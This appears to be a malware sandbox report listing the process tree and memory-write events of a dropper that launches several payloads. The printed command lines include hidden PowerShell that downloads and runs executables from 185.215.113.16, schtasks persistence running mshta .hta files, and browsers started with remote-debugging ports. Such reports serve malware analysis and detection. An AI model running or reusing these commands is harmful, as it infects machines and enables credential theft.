N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 428 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1828 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 1828 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 4592 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 1828 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3380 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3380 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 152

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd14fecc40,0x7ffd14fecc4c,0x7ffd14fecc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4244,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "jWtzpmatznG" /tr "mshta \"C:\Temp\9undwL0Qa.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\9undwL0Qa.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd14ff46f8,0x7ffd14ff4708,0x7ffd14ff4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1

C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE

"C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE"

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3ozmo" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4932 -ip 4932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 808

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

Network


Files
